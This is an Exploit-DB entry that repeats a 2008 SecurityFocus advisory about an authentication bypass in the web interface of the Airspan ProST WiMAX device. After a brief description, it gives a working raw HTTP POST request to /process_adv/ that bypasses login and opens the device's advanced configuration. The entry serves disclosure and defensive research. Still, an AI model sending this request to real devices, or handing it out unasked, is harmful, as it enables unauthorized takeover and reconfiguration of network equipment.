Airspan ProST WiMAX Device - Web Interface Authentication Bypass

EDB-ID:

31342




Platform:

Hardware

Date:

2008-03-06


source: https://www.securityfocus.com/bid/28122/info

Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.

An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.

POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

DialogText=&Advanced=1